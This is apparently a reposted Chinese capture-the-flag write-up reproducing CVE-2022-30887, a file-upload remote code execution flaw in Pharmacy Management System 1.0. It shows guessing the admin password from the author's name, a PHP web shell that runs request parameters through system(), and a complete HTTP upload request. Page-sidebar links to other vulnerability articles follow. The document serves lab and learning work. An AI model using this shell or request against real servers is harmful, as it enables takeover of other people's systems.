Pharmacy Management System远程代码执行漏洞（CVE-2022-30887）

0x01 i春秋靶场介绍

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的，该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。

0x02 漏洞描述

Pharmacy Management System是一个多语言药房管理系统。

Pharmacy Management System v1.0 版本存在远程代码执行漏洞，该漏洞源于组件/php_action/editProductImage.php未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

0x03 详细步骤

进入靶场，界面如下：

忘记密码功能无法使用，弱口令也无果，密码总显示错误。

发现下方作者链接可以跳转：

进而发现系统的源代码可以下载：

下载地址：https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download

然后看到了作者的邮箱地址：

（这个弹窗一开始没注意到，不用点×，点其他地方一下子就没了，容易忽略）

通过邮件收到作者发来的源码时，也可以看到作者邮箱地址（有延迟）：

（可以通过源码尝试进行代码审计。。。）

这里利用作者的邮件和名字社工密码，最终找到正确的账号密码：

email：[email protected]
password：mayurik

成功登录：

进入后台，发现文件上传点：

随便填一下：

shell.php：

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>

上传成功：

右击图片复制图片地址
找到文件上传地址：http://xxxxx.cloudeci1.ichunqiu.com/assets/myimages/shell.php

访问成功：

添加payload命令执行，找到flag

0x04 POC

地址：https://packetstormsecurity.com/files/166786/Pharmacy-Management-System-1.0-Shell-Upload.html

根据靶场php_action/editProductImage.php提示，修改POC：

# POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 559
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"

-----------------------------208935235035266125502673738631--

标签：30887,Management,System,Pharmacy,漏洞,代码执行,php
From： https://www.cnblogs.com/0dot7/p/17216765.html

hxp ctf valentine ejs ssti 语法特性造成的漏洞
拿到源码，是一个node.js写的后端，源码如下：app.js:varexpress=require('express');varbodyParser=require('body-parser')constcrypto=require("crypto");var......
远程代码执行漏洞RCE
远程代码执行漏洞RCE1、RCERemoteCodeExecute远程代码执行RemoteCommandExecute远程命令执行2、危害窃取服务器的敏感数据、文件对电脑的文件加密，实施勒索......
2022 漏洞分析期末试题详解
环境准备关闭地址随机化用sudochownroot...和sudochmod4755...为q1~q5设置特权q1题解题面：short类型最大值为65535，input的长度高于该值即可造成整数溢......
FastJson 反序列化漏洞原理分析
Fastjson简介fastjson框架：https://github.com/alibaba/fastjsonfastjson-jndi：https://github.com/earayu/fastjson_jndi_pocfastjson是阿里巴巴开发的java语言编写的......
文件包含漏洞
b站蜗牛学院课2-P121所用虚拟机地址：192.168.112.188所用本机地址：192.168.112.1Part1文件包含基本知识一、本地文件包含1.源代码在虚拟机的security/fileinc.php......
【漏洞复现】Apache HTTPD 换行解析漏洞 (CVE-2017-15715)
ApacheHTTPD换行解析漏洞(CVE-2017-15715)0x01漏洞描述ApacheHTTPD是一款HTTP服务器，它可以通过mod_PHP来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞，在解......
shiro-550反序列化漏洞分析
0x00环境搭建首先下载有漏洞的版本https://codeload.github.com/apache/shiro/zip/refs/tags/shiro-root-1.2.4配置samples/web的pom文件配置tomcat配置......
文件包含漏洞（学习中）
b站蜗牛学院课2-P121所用虚拟机地址：192.168.112.188所用本机地址：192.168.112.1一、本地文件包含1.源代码在虚拟机的security/fileinc.php文件中写入如下代码：<?php......
Zip Slip漏洞审计实战
前言最近看到许少的推有说到ZipSlip这个漏洞导致的RCE，其实我在代码审计的时候确实发现有不少功能模块都是使用ZIP来解压，其实还是在真实系统中经常见到的。于是想着好久......
禅道系统权限绕过与命令执行漏洞分析
漏洞概述禅道是第一款国产的开源项目管理软件，也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞，官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是......

【漏洞复现】Pharmacy Management System远程代码执行漏洞（CVE-2022-30887）

Pharmacy Management System远程代码执行漏洞（CVE-2022-30887）

0x01 i春秋靶场介绍

0x02 漏洞描述

0x03 详细步骤

0x04 POC

相关文章

赞助商

阅读排行